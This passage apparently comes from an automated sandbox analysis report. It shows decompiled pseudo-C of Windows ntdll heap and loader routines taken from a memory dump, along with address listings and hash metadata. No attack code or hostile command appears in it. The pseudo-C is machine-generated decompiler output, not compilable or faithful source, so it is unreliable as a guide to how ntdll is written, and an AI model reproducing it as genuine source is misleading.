                                                                                                                          									}
                                                                                                                          									_t283 = _v24;
                                                                                                                          								}
                                                                                                                          								goto L70;
                                                                                                                          							}
                                                                                                                          							L19:
                                                                                                                          							_t193 =  *_t238;
                                                                                                                          							_t284 =  *((intOrPtr*)(_t238 + 4));
                                                                                                                          							_t254 =  *((intOrPtr*)(_t193 + 4));
                                                                                                                          							_v24 = _t254;
                                                                                                                          							_t238 = _v16;
                                                                                                                          							if( *_t284 != _t254 ||  *_t284 != _t238) {
                                                                                                                          								_push(_t238);
                                                                                                                          								_push( *_t284);
                                                                                                                          								E00A8A80D(0, 0xd, _t238, _v24);
                                                                                                                          								_t238 = _v16;
                                                                                                                          							} else {
                                                                                                                          								 *_t284 = _t193;
                                                                                                                          								 *((intOrPtr*)(_t193 + 4)) = _t284;
                                                                                                                          							}
                                                                                                                          							goto L22;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L10:
                                                                                                                          					_t144 = 0x7ffe0380;
                                                                                                                          					goto L11;
                                                                                                                          				}
                                                                                                                          			}





















































                                                                                                                          0x00a32a07
                                                                                                                          0x009eb549
                                                                                                                          0x009eb54e
                                                                                                                          0x00a32a12
                                                                                                                          0x00a32a15
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32a24
                                                                                                                          0x009eb559
                                                                                                                          0x009eb55c
                                                                                                                          0x00a32a34
                                                                                                                          0x00a32a3b
                                                                                                                          0x00a32a4d
                                                                                                                          0x00a32a4d
                                                                                                                          0x00a32a3b
                                                                                                                          0x009eb566
                                                                                                                          0x009eb56b
                                                                                                                          0x009eb56f
                                                                                                                          0x009eb57b
                                                                                                                          0x009eb582
                                                                                                                          0x00a32a57
                                                                                                                          0x00a32a5c
                                                                                                                          0x00a32a5c
                                                                                                                          0x009eb582
                                                                                                                          0x009eb58b
                                                                                                                          0x009eb58e
                                                                                                                          0x009eb592
                                                                                                                          0x009eb596
                                                                                                                          0x009eb599
                                                                                                                          0x009eb59b
                                                                                                                          0x009eb59e
                                                                                                                          0x009eb5a3
                                                                                                                          0x009eb5a6
                                                                                                                          0x009eb5a9
                                                                                                                          0x00a32a66
                                                                                                                          0x00a32a67
                                                                                                                          0x00a32a73
                                                                                                                          0x00a32a78
                                                                                                                          0x009eb5b8
                                                                                                                          0x009eb5b8
                                                                                                                          0x009eb5bb
                                                                                                                          0x009eb5bd
                                                                                                                          0x009eb5bd
                                                                                                                          0x009eb5c4
                                                                                                                          0x009eb5f7
                                                                                                                          0x009eb5f7
                                                                                                                          0x009eb600
                                                                                                                          0x009eb606
                                                                                                                          0x009eb60c
                                                                                                                          0x009eb612
                                                                                                                          0x009eb618
                                                                                                                          0x009eb621
                                                                                                                          0x009eb623
                                                                                                                          0x009eb629
                                                                                                                          0x009eb629
                                                                                                                          0x009eb62c
                                                                                                                          0x009eb62f
                                                                                                                          0x009eb633
                                                                                                                          0x009eb636
                                                                                                                          0x009eb639
                                                                                                                          0x009eb71d
                                                                                                                          0x009eb720
                                                                                                                          0x009eb736
                                                                                                                          0x009eb660
                                                                                                                          0x009eb660
                                                                                                                          0x009eb662
                                                                                                                          0x009eb665
                                                                                                                          0x009eb66a
                                                                                                                          0x009eb6e6
                                                                                                                          0x009eb6e7
                                                                                                                          0x009eb6ea
                                                                                                                          0x009eb6ef
                                                                                                                          0x00a32ad1
                                                                                                                          0x00a32ad2
                                                                                                                          0x00a32ad8
                                                                                                                          0x00a32add
                                                                                                                          0x00a32add
                                                                                                                          0x009eb6f5
                                                                                                                          0x009eb6f5
                                                                                                                          0x009eb672
                                                                                                                          0x009eb675
                                                                                                                          0x009eb67a
                                                                                                                          0x00a32ae5
                                                                                                                          0x00a32ae8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32af4
                                                                                                                          0x00a32afc
                                                                                                                          0x00000000
                                                                                                                          0x009eb680
                                                                                                                          0x009eb680
                                                                                                                          0x009eb680
                                                                                                                          0x009eb685
                                                                                                                          0x009eb687
                                                                                                                          0x009eb68a
                                                                                                                          0x00a32b06
                                                                                                                          0x00a32b0c
                                                                                                                          0x00a32b13
                                                                                                                          0x00a32b1e
                                                                                                                          0x00a32b20
                                                                                                                          0x00a32b2b
                                                                                                                          0x00a32b2b
                                                                                                                          0x00a32b2b
                                                                                                                          0x00a32b34
                                                                                                                          0x00a32b45
                                                                                                                          0x00a32b45
                                                                                                                          0x00a32b13
                                                                                                                          0x009eb696
                                                                                                                          0x009eb69b
                                                                                                                          0x009eb6a0
                                                                                                                          0x00a32b4f
                                                                                                                          0x00a32b52
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32b61
                                                                                                                          0x00000000
                                                                                                                          0x009eb6a6
                                                                                                                          0x009eb6a6
                                                                                                                          0x009eb6a6
                                                                                                                          0x009eb6a8
                                                                                                                          0x009eb6ab
                                                                                                                          0x00a32b70
                                                                                                                          0x00a32b72
                                                                                                                          0x00a32b7d
                                                                                                                          0x00a32b7d
                                                                                                                          0x00a32b7d
                                                                                                                          0x00a32b86
                                                                                                                          0x00a32b97
                                                                                                                          0x00a32b97
                                                                                                                          0x009eb6b1
                                                                                                                          0x00000000
                                                                                                                          0x009eb6b1
                                                                                                                          0x009eb6a0
                                                                                                                          0x009eb67a
                                                                                                                          0x009eb722
                                                                                                                          0x009eb722
                                                                                                                          0x009eb655
                                                                                                                          0x009eb65d
                                                                                                                          0x00000000
                                                                                                                          0x009eb5c6
                                                                                                                          0x009eb5c6
                                                                                                                          0x009eb5ce
                                                                                                                          0x00a32a83
                                                                                                                          0x00a32a97
                                                                                                                          0x00a32a97
                                                                                                                          0x00a32a9a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32a88
                                                                                                                          0x00a32a8a
                                                                                                                          0x00a32a8c
                                                                                                                          0x00a32a8f
                                                                                                                          0x00a32a92
                                                                                                                          0x00a32aa1
                                                                                                                          0x00a32aa1
                                                                                                                          0x00a32aa2
                                                                                                                          0x00a32aab
                                                                                                                          0x00a32ab0
                                                                                                                          0x00000000
                                                                                                                          0x00a32ab0
                                                                                                                          0x00a32a94
                                                                                                                          0x00a32a94
                                                                                                                          0x00000000
                                                                                                                          0x00a32a9c
                                                                                                                          0x009eb5d4
                                                                                                                          0x009eb5d4
                                                                                                                          0x009eb5d6
                                                                                                                          0x009eb5d9
                                                                                                                          0x009eb5de
                                                                                                                          0x009eb5e1
                                                                                                                          0x009eb5e4
                                                                                                                          0x00a32ab8
                                                                                                                          0x00a32ab9
                                                                                                                          0x00a32ac4
                                                                                                                          0x00a32ac9
                                                                                                                          0x009eb5f2
                                                                                                                          0x009eb5f2
                                                                                                                          0x009eb5f4
                                                                                                                          0x009eb5f4
                                                                                                                          0x00000000
                                                                                                                          0x009eb5e4
                                                                                                                          0x009eb5c4
                                                                                                                          0x009eb554
                                                                                                                          0x009eb554
                                                                                                                          0x00000000
                                                                                                                          0x009eb554

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-4253913091
                                                                                                                          • Opcode ID: ed67abeb0aa483d9b9bfcd059f50515d69f858220759656b4e6f5e9893693826
                                                                                                                          • Instruction ID: 0964b938fe6bfb75fb02512c0ae32e5ad9feeb6c86b53e644a34f022a1561c02
                                                                                                                          • Opcode Fuzzy Hash: ed67abeb0aa483d9b9bfcd059f50515d69f858220759656b4e6f5e9893693826
                                                                                                                          • Instruction Fuzzy Hash: 7AE18A70A00245DFDB1ACF69C895BBAB7B5FF44704F2485A9E4069B392D734ED41CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E009D8794(void* __ecx) {
                                                                                                                          				signed int _v0;
                                                                                                                          				char _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v40;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* __ebp;
                                                                                                                          				intOrPtr* _t77;
                                                                                                                          				signed int _t80;
                                                                                                                          				signed char _t81;
                                                                                                                          				signed int _t87;
                                                                                                                          				signed int _t91;
                                                                                                                          				void* _t92;
                                                                                                                          				void* _t94;
                                                                                                                          				signed int _t95;
                                                                                                                          				signed int _t103;
                                                                                                                          				signed int _t105;
                                                                                                                          				signed int _t110;
                                                                                                                          				signed int _t118;
                                                                                                                          				intOrPtr* _t121;
                                                                                                                          				intOrPtr _t122;
                                                                                                                          				signed int _t125;
                                                                                                                          				signed int _t129;
                                                                                                                          				signed int _t131;
                                                                                                                          				signed int _t134;
                                                                                                                          				signed int _t136;
                                                                                                                          				signed int _t143;
                                                                                                                          				signed int* _t147;
                                                                                                                          				signed int _t151;
                                                                                                                          				void* _t153;
                                                                                                                          				signed int* _t157;
                                                                                                                          				signed int _t159;
                                                                                                                          				signed int _t161;
                                                                                                                          				signed int _t166;
                                                                                                                          				signed int _t168;
                                                                                                                          
                                                                                                                          				_push(__ecx);
                                                                                                                          				_t153 = __ecx;
                                                                                                                          				_t159 = 0;
                                                                                                                          				_t121 = __ecx + 0x3c;
                                                                                                                          				if( *_t121 == 0) {
                                                                                                                          					L2:
                                                                                                                          					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                                                                          					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                                                                          						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                                                          						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                                                                          						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                                                                          							L6:
                                                                                                                          							if(E009D934A() != 0) {
                                                                                                                          								_t159 = E00A4A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                                                                          								__eflags = _t159;
                                                                                                                          								if(_t159 < 0) {
                                                                                                                          									_t81 =  *0xab5780; // 0x0
                                                                                                                          									__eflags = _t81 & 0x00000003;
                                                                                                                          									if((_t81 & 0x00000003) != 0) {
                                                                                                                          										_push(_t159);
                                                                                                                          										E00A45510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                                                                          										_t81 =  *0xab5780; // 0x0
                                                                                                                          									}
                                                                                                                          									__eflags = _t81 & 0x00000010;
                                                                                                                          									if((_t81 & 0x00000010) != 0) {
                                                                                                                          										asm("int3");
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							_t159 = E009D849B(0, _t122, _t153, _t159, _t180);
                                                                                                                          							if(_t159 >= 0) {
                                                                                                                          								goto L6;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t80 = _t159;
                                                                                                                          						goto L8;
                                                                                                                          					} else {
                                                                                                                          						_t125 = 0x13;
                                                                                                                          						asm("int 0x29");
                                                                                                                          						_push(0);
                                                                                                                          						_push(_t159);
                                                                                                                          						_t161 = _t125;
                                                                                                                          						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                                                                          						_t143 = 0;
                                                                                                                          						_v40 = _t161;
                                                                                                                          						_t118 = 0;
                                                                                                                          						_push(_t153);
                                                                                                                          						__eflags = _t87;
                                                                                                                          						if(_t87 != 0) {
                                                                                                                          							_t118 = _t87 + 0x5d8;
                                                                                                                          							__eflags = _t118;
                                                                                                                          							if(_t118 == 0) {
                                                                                                                          								L46:
                                                                                                                          								_t118 = 0;
                                                                                                                          							} else {
                                                                                                                          								__eflags =  *(_t118 + 0x30);
                                                                                                                          								if( *(_t118 + 0x30) == 0) {
                                                                                                                          									goto L46;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_v32 = 0;
                                                                                                                          						_v28 = 0;
                                                                                                                          						_v16 = 0;
                                                                                                                          						_v20 = 0;
                                                                                                                          						_v12 = 0;
                                                                                                                          						__eflags = _t118;
                                                                                                                          						if(_t118 != 0) {
                                                                                                                          							__eflags = _t161;
                                                                                                                          							if(_t161 != 0) {
                                                                                                                          								__eflags =  *(_t118 + 8);
                                                                                                                          								if( *(_t118 + 8) == 0) {
                                                                                                                          									L22:
                                                                                                                          									_t143 = 1;
                                                                                                                          									__eflags = 1;
                                                                                                                          								} else {
                                                                                                                          									_t19 = _t118 + 0x40; // 0x40
                                                                                                                          									_t156 = _t19;
                                                                                                                          									E009D8999(_t19,  &_v16);
                                                                                                                          									__eflags = _v0;
                                                                                                                          									if(_v0 != 0) {
                                                                                                                          										__eflags = _v0 - 1;
                                                                                                                          										if(_v0 != 1) {
                                                                                                                          											goto L22;
                                                                                                                          										} else {
                                                                                                                          											_t128 =  *(_t161 + 0x64);
                                                                                                                          											__eflags =  *(_t161 + 0x64);
                                                                                                                          											if( *(_t161 + 0x64) == 0) {
                                                                                                                          												goto L22;
                                                                                                                          											} else {
                                                                                                                          												E009D8999(_t128,  &_v12);
                                                                                                                          												_t147 = _v12;
                                                                                                                          												_t91 = 0;
                                                                                                                          												__eflags = 0;
                                                                                                                          												_t129 =  *_t147;
                                                                                                                          												while(1) {
                                                                                                                          													__eflags =  *((intOrPtr*)(0xab5c60 + _t91 * 8)) - _t129;
                                                                                                                          													if( *((intOrPtr*)(0xab5c60 + _t91 * 8)) == _t129) {
                                                                                                                          														break;
                                                                                                                          													}
                                                                                                                          													_t91 = _t91 + 1;
                                                                                                                          													__eflags = _t91 - 5;
                                                                                                                          													if(_t91 < 5) {
                                                                                                                          														continue;
                                                                                                                          													} else {
                                                                                                                          														_t131 = 0;
                                                                                                                          														__eflags = 0;
                                                                                                                          													}
                                                                                                                          													L37:
                                                                                                                          													__eflags = _t131;
                                                                                                                          													if(_t131 != 0) {
                                                                                                                          														goto L22;
                                                                                                                          													} else {
                                                                                                                          														__eflags = _v16 - _t147;
                                                                                                                          														if(_v16 != _t147) {
                                                                                                                          															goto L22;
                                                                                                                          														} else {
                                                                                                                          															E009E2280(_t92, 0xab86cc);
                                                                                                                          															_t94 = E00A99DFB( &_v20);
                                                                                                                          															__eflags = _t94 - 1;
                                                                                                                          															if(_t94 != 1) {
                                                                                                                          															}
                                                                                                                          															asm("movsd");
                                                                                                                          															asm("movsd");
                                                                                                                          															asm("movsd");
                                                                                                                          															asm("movsd");
                                                                                                                          															 *_t118 =  *_t118 + 1;
                                                                                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                                                                                          															_t95 = E009F61A0( &_v32);
                                                                                                                          															__eflags = _t95;
                                                                                                                          															if(_t95 != 0) {
                                                                                                                          																__eflags = _v32 | _v28;
                                                                                                                          																if((_v32 | _v28) != 0) {
                                                                                                                          																	_t71 = _t118 + 0x40; // 0x3f
                                                                                                                          																	_t134 = _t71;
                                                                                                                          																	goto L55;
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          															goto L30;
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          													goto L56;
                                                                                                                          												}
                                                                                                                          												_t92 = 0xab5c64 + _t91 * 8;
                                                                                                                          												asm("lock xadd [eax], ecx");
                                                                                                                          												_t131 = (_t129 | 0xffffffff) - 1;
                                                                                                                          												goto L37;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										goto L56;
                                                                                                                          									} else {
                                                                                                                          										_t143 = E009D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                                                                          										__eflags = _t143;
                                                                                                                          										if(_t143 != 0) {
                                                                                                                          											_t157 = _v12;
                                                                                                                          											_t103 = 0;
                                                                                                                          											__eflags = 0;
                                                                                                                          											_t136 =  &(_t157[1]);
                                                                                                                          											 *(_t161 + 0x64) = _t136;
                                                                                                                          											_t151 =  *_t157;
                                                                                                                          											_v20 = _t136;
                                                                                                                          											while(1) {
                                                                                                                          												__eflags =  *((intOrPtr*)(0xab5c60 + _t103 * 8)) - _t151;
                                                                                                                          												if( *((intOrPtr*)(0xab5c60 + _t103 * 8)) == _t151) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												_t103 = _t103 + 1;
                                                                                                                          												__eflags = _t103 - 5;
                                                                                                                          												if(_t103 < 5) {
                                                                                                                          													continue;
                                                                                                                          												}
                                                                                                                          												L21:
                                                                                                                          												_t105 = E00A0F380(_t136, 0x9a1184, 0x10);
                                                                                                                          												__eflags = _t105;
                                                                                                                          												if(_t105 != 0) {
                                                                                                                          													__eflags =  *_t157 -  *_v16;
                                                                                                                          													if( *_t157 >=  *_v16) {
                                                                                                                          														goto L22;
                                                                                                                          													} else {
                                                                                                                          														asm("cdq");
                                                                                                                          														_t166 = _t157[5] & 0x0000ffff;
                                                                                                                          														_t108 = _t157[5] & 0x0000ffff;
                                                                                                                          														asm("cdq");
                                                                                                                          														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                                                                          														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                                                                          														if(__eflags > 0) {
                                                                                                                          															L29:
                                                                                                                          															E009E2280(_t108, 0xab86cc);
                                                                                                                          															 *_t118 =  *_t118 + 1;
                                                                                                                          															_t42 = _t118 + 0x40; // 0x3f
                                                                                                                          															_t156 = _t42;
                                                                                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                                                                                          															asm("movsd");
                                                                                                                          															asm("movsd");
                                                                                                                          															asm("movsd");
                                                                                                                          															asm("movsd");
                                                                                                                          															_t110 = E009F61A0( &_v32);
                                                                                                                          															__eflags = _t110;
                                                                                                                          															if(_t110 != 0) {
                                                                                                                          																__eflags = _v32 | _v28;
                                                                                                                          																if((_v32 | _v28) != 0) {
                                                                                                                          																	_t134 = _v20;
                                                                                                                          																	L55:
                                                                                                                          																	E00A99D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          															L30:
                                                                                                                          															 *_t118 =  *_t118 + 1;
                                                                                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                                                                                          															E009DFFB0(_t118, _t156, 0xab86cc);
                                                                                                                          															goto L22;
                                                                                                                          														} else {
                                                                                                                          															if(__eflags < 0) {
                                                                                                                          																goto L22;
                                                                                                                          															} else {
                                                                                                                          																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                                                                          																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                                                                          																	goto L22;
                                                                                                                          																} else {
                                                                                                                          																	goto L29;
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          													goto L56;
                                                                                                                          												}
                                                                                                                          												goto L22;
                                                                                                                          											}
                                                                                                                          											asm("lock inc dword [eax]");
                                                                                                                          											goto L21;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						return _t143;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_push( &_v8);
                                                                                                                          					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                                                                          					_push(__ecx + 0x40);
                                                                                                                          					_push(_t121);
                                                                                                                          					_push(0xffffffff);
                                                                                                                          					_t80 = E00A09A00();
                                                                                                                          					_t159 = _t80;
                                                                                                                          					if(_t159 < 0) {
                                                                                                                          						L8:
                                                                                                                          						return _t80;
                                                                                                                          					} else {
                                                                                                                          						goto L2;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L56:
                                                                                                                          			}












































                                                                                                                          0x009d88ee
                                                                                                                          0x009d88f0
                                                                                                                          0x009d88f3
                                                                                                                          0x009d88fc
                                                                                                                          0x009d8901
                                                                                                                          0x009d8906
                                                                                                                          0x009d890c
                                                                                                                          0x009d890c
                                                                                                                          0x009d890f
                                                                                                                          0x009d8916
                                                                                                                          0x009d8917
                                                                                                                          0x009d8918
                                                                                                                          0x009d8919
                                                                                                                          0x009d891a
                                                                                                                          0x009d891f
                                                                                                                          0x009d8921
                                                                                                                          0x00a29c52
                                                                                                                          0x00a29c55
                                                                                                                          0x00a29c5b
                                                                                                                          0x00a29cac
                                                                                                                          0x00a29cc0
                                                                                                                          0x00a29cc0
                                                                                                                          0x00a29c55
                                                                                                                          0x009d8927
                                                                                                                          0x009d8927
                                                                                                                          0x009d892f
                                                                                                                          0x009d8933
                                                                                                                          0x00000000
                                                                                                                          0x009d88f5
                                                                                                                          0x009d88f5
                                                                                                                          0x00000000
                                                                                                                          0x009d88f7
                                                                                                                          0x009d88f7
                                                                                                                          0x009d88fa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009d88fa
                                                                                                                          0x009d88f5
                                                                                                                          0x009d88f3
                                                                                                                          0x00000000
                                                                                                                          0x009d88d5
                                                                                                                          0x00000000
                                                                                                                          0x009d88b2
                                                                                                                          0x009d88c9
                                                                                                                          0x00000000
                                                                                                                          0x009d88c9
                                                                                                                          0x009d887f
                                                                                                                          0x009d886a
                                                                                                                          0x009d8857
                                                                                                                          0x009d8852
                                                                                                                          0x009d88bf
                                                                                                                          0x009d88bf
                                                                                                                          0x009d87aa
                                                                                                                          0x009d87ad
                                                                                                                          0x009d87ae
                                                                                                                          0x009d87b4
                                                                                                                          0x009d87b5
                                                                                                                          0x009d87b6
                                                                                                                          0x009d87b8
                                                                                                                          0x009d87bd
                                                                                                                          0x009d87c1
                                                                                                                          0x009d87f4
                                                                                                                          0x009d87fa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009d87c1
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          • LdrpDoPostSnapWork, xrefs: 00A29C1E
                                                                                                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00A29C18
                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 00A29C28
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                          • API String ID: 2994545307-1948996284
                                                                                                                          • Opcode ID: f0eb616ac58bb0cd06a7fbee6a7606b7569f999533805751f255f1986f00d45a
                                                                                                                          • Instruction ID: ff64d95942546073ef6e5607660c4046cd0571a22c8c8cfc59004c3746b95507
                                                                                                                          • Opcode Fuzzy Hash: f0eb616ac58bb0cd06a7fbee6a7606b7569f999533805751f255f1986f00d45a
                                                                                                                          • Instruction Fuzzy Hash: 6991F371A4021AAFDF18DF59C881ABB77B9FF84310B54816AE915AB352DF30ED01DB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E009FAC7B(void* __ecx, signed short* __edx) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* __ebx;
                                                                                                                          				signed char _t75;
                                                                                                                          				signed int _t79;
                                                                                                                          				signed int _t88;
                                                                                                                          				intOrPtr _t89;
                                                                                                                          				signed int _t96;
                                                                                                                          				signed char* _t97;
                                                                                                                          				intOrPtr _t98;
                                                                                                                          				signed int _t101;
                                                                                                                          				signed char* _t102;
                                                                                                                          				intOrPtr _t103;
                                                                                                                          				signed int _t105;
                                                                                                                          				signed char* _t106;
                                                                                                                          				signed int _t131;
                                                                                                                          				signed int _t138;
                                                                                                                          				void* _t149;
                                                                                                                          				signed short* _t150;
                                                                                                                          
                                                                                                                          				_t150 = __edx;
                                                                                                                          				_t149 = __ecx;
                                                                                                                          				_t70 =  *__edx & 0x0000ffff;
                                                                                                                          				__edx[1] = __edx[1] & 0x000000f8;
                                                                                                                          				__edx[3] = 0;
                                                                                                                          				_v8 =  *__edx & 0x0000ffff;
                                                                                                                          				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                                                                                                                          					_t39 =  &(_t150[8]); // 0x8
                                                                                                                          					E00A1D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                                                                                                                          					__edx[1] = __edx[1] | 0x00000004;
                                                                                                                          				}
                                                                                                                          				_t75 =  *(_t149 + 0xcc) ^  *0xab8a68;
                                                                                                                          				if(_t75 != 0) {
                                                                                                                          					L4:
                                                                                                                          					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                                                                                                          						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                                                                                                                          						_t79 =  *(_t149 + 0x50);
                                                                                                                          						 *_t150 =  *_t150 ^ _t79;
                                                                                                                          						return _t79;
                                                                                                                          					}
                                                                                                                          					return _t75;
                                                                                                                          				} else {
                                                                                                                          					_t9 =  &(_t150[0x80f]); // 0x1017
                                                                                                                          					_t138 = _t9 & 0xfffff000;
                                                                                                                          					_t10 =  &(_t150[0x14]); // 0x20
                                                                                                                          					_v12 = _t138;
                                                                                                                          					if(_t138 == _t10) {
                                                                                                                          						_t138 = _t138 + 0x1000;
                                                                                                                          						_v12 = _t138;
                                                                                                                          					}
                                                                                                                          					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                                                                                                                          					if(_t75 > _t138) {
                                                                                                                          						_v8 = _t75 - _t138;
                                                                                                                          						_push(0x4000);
                                                                                                                          						_push( &_v8);
                                                                                                                          						_push( &_v12);
                                                                                                                          						_push(0xffffffff);
                                                                                                                          						_t131 = E00A096E0();
                                                                                                                          						__eflags = _t131 - 0xc0000045;
                                                                                                                          						if(_t131 == 0xc0000045) {
                                                                                                                          							_t88 = E00A73C60(_v12, _v8);
                                                                                                                          							__eflags = _t88;
                                                                                                                          							if(_t88 != 0) {
                                                                                                                          								_push(0x4000);
                                                                                                                          								_push( &_v8);
                                                                                                                          								_push( &_v12);
                                                                                                                          								_push(0xffffffff);
                                                                                                                          								_t131 = E00A096E0();
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t89 =  *[fs:0x30];
                                                                                                                          						__eflags = _t131;
                                                                                                                          						if(_t131 < 0) {
                                                                                                                          							__eflags =  *(_t89 + 0xc);
                                                                                                                          							if( *(_t89 + 0xc) == 0) {
                                                                                                                          								_push("HEAP: ");
                                                                                                                          								E009CB150();
                                                                                                                          							} else {
                                                                                                                          								E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          							}
                                                                                                                          							_push(_v8);
                                                                                                                          							_push(_v12);
                                                                                                                          							_push(_t149);
                                                                                                                          							_t75 = E009CB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                                                                                                                          							goto L4;
                                                                                                                          						} else {
                                                                                                                          							_t96 =  *(_t89 + 0x50);
                                                                                                                          							_t132 = 0x7ffe0380;
                                                                                                                          							__eflags = _t96;
                                                                                                                          							if(_t96 != 0) {
                                                                                                                          								__eflags =  *_t96;
                                                                                                                          								if( *_t96 == 0) {
                                                                                                                          									goto L10;
                                                                                                                          								}
                                                                                                                          								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                                                                          								L11:
                                                                                                                          								__eflags =  *_t97;
                                                                                                                          								if( *_t97 != 0) {
                                                                                                                          									_t98 =  *[fs:0x30];
                                                                                                                          									__eflags =  *(_t98 + 0x240) & 0x00000001;
                                                                                                                          									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                                                                                                                          										E00A814FB(_t132, _t149, _v12, _v8, 7);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                                                                                                                          								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                                                                                                                          								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                                                                                                                          								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                                                                                                                          								_t101 =  *( *[fs:0x30] + 0x50);
                                                                                                                          								__eflags = _t101;
                                                                                                                          								if(_t101 != 0) {
                                                                                                                          									__eflags =  *_t101;
                                                                                                                          									if( *_t101 == 0) {
                                                                                                                          										goto L13;
                                                                                                                          									}
                                                                                                                          									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                                                                          									goto L14;
                                                                                                                          								} else {
                                                                                                                          									L13:
                                                                                                                          									_t102 = _t132;
                                                                                                                          									L14:
                                                                                                                          									__eflags =  *_t102;
                                                                                                                          									if( *_t102 != 0) {
                                                                                                                          										_t103 =  *[fs:0x30];
                                                                                                                          										__eflags =  *(_t103 + 0x240) & 0x00000001;
